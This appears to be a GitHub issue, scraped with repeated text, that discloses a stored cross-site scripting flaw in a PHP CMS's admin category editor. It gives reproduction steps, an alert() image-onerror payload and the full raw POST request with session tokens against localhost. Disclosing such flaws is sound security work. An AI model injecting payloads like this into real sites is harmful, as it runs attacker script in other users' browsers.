We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
1.After the administrator logged in, open the following page: http://127.0.0.1/?s=/admin/article/articleCategory/ 2.click 'modify' 3.fill payload in Category Name : "><imG/src=1 onerror=alert(1)> 4.save 5.The request package : POST /?s=/article/ApiAdminArticle/categoryEdit HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Referer: http://127.0.0.1/?s=/admin/article/articleCategory/ Content-Type: application/json;charset=utf-8 access-key: cFaLOmUGoz9URROtxaAqe37vHSlI0LL3 terminal: pc uid: 9afb4393b6cddbeb7418ab77 access-token: 06cdb3c844508158ebb7483c221c9e63 Content-Length: 324 Cookie: security_level=0; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1549460630; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1553359007; lang_type=zh-CN; bdshare_firstime=1549546719595; wp-settings-time-1=1551345212; PHPSESSID=65unerfghovped0ap7eokcrdi3; admin_id=1; admin_level=1; admin_name=admin; admin_secret=8b99f316efb80526f2434ded92036bff; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1553359007 DNT: 1 Connection: close
http://127.0.0.1/?s=/admin/article/articleCategory/
"><imG/src=1 onerror=alert(1)>
POST /?s=/article/ApiAdminArticle/categoryEdit HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Referer: http://127.0.0.1/?s=/admin/article/articleCategory/ Content-Type: application/json;charset=utf-8 access-key: cFaLOmUGoz9URROtxaAqe37vHSlI0LL3 terminal: pc uid: 9afb4393b6cddbeb7418ab77 access-token: 06cdb3c844508158ebb7483c221c9e63 Content-Length: 324 Cookie: security_level=0; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1549460630; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1553359007; lang_type=zh-CN; bdshare_firstime=1549546719595; wp-settings-time-1=1551345212; PHPSESSID=65unerfghovped0ap7eokcrdi3; admin_id=1; admin_level=1; admin_name=admin; admin_secret=8b99f316efb80526f2434ded92036bff; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1553359007 DNT: 1 Connection: close
{"id":1,"pid":0,"name":""><imG/src=1 onerror=alert(1)>","url_name":"123","seo_title":"","template":"article.html","detail_template":"articleDetail.html","category_url":"/article/<url_name>/","category_page_url":"<category_url>index_.html","detail_url":"/article/.html","description":"","keywords":"","content":""}
6.open the url it will trigger: http://127.0.0.1/index.php?s=/article/123/
http://127.0.0.1/index.php?s=/article/123/
The text was updated successfully, but these errors were encountered:
No branches or pull requests
1.After the administrator logged in, open the following page:
http://127.0.0.1/?s=/admin/article/articleCategory/
2.click 'modify'
3.fill payload in Category Name :
"><imG/src=1 onerror=alert(1)>
4.save
5.The request package :
POST /?s=/article/ApiAdminArticle/categoryEdit HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://127.0.0.1/?s=/admin/article/articleCategory/
Content-Type: application/json;charset=utf-8
access-key: cFaLOmUGoz9URROtxaAqe37vHSlI0LL3
terminal: pc
uid: 9afb4393b6cddbeb7418ab77
access-token: 06cdb3c844508158ebb7483c221c9e63
Content-Length: 324
Cookie: security_level=0; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1549460630; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1553359007; lang_type=zh-CN; bdshare_firstime=1549546719595; wp-settings-time-1=1551345212; PHPSESSID=65unerfghovped0ap7eokcrdi3; admin_id=1; admin_level=1; admin_name=admin; admin_secret=8b99f316efb80526f2434ded92036bff; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1553359007
DNT: 1
Connection: close
{"id":1,"pid":0,"name":""><imG/src=1 onerror=alert(1)>","url_name":"123","seo_title":"","template":"article.html","detail_template":"articleDetail.html","category_url":"/article/<url_name>/","category_page_url":"<category_url>index_.html","detail_url":"/article/.html","description":"","keywords":"","content":""}
6.open the url it will trigger:
http://127.0.0.1/index.php?s=/article/123/
The text was updated successfully, but these errors were encountered: